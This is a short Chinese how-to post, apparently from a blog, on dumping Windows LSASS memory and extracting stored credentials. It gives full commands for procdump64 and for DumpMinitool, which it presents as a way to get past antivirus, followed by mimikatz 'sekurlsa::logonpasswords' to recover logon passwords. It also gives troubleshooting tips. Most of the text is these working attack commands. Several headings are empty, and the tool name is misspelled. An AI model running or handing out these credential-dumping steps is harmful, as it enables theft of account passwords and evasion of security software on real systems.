使用工具
使用条件
使用方式一
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
破解获取到的密码(不必管理员权限)
mimikatx.exe “sekurlsa::minidump lsass.dmp所在路径” “sekurlsa::logonpasswords full”
注意:sekurlsa::minidump 目录\lsass.dmp //将导出的lsass.dmp载入到Mimikatz中
使用方式二(绕过杀软获取lsass)
使用条件
工具
使用
1.DumpMinitool.exe —file dump.txt —processId 696 —dumpType Full #说明:pid:通过tasklist /v |findstr lsass获取到的pid。—file:保存结果的文件名字
2.通过mimikatx离线破解(破解只需要普通权限cmd窗口即可)
mimikatz.exe “privilege::debug” “sekurlsa::minidump ./dump.dmp” “sekurlsa::logonpasswords”
注意:如果mimikatz出现以下报错,则换个2.1.1版本的mimikatz即可破解
若有收获,就点个赞吧
0 人点赞
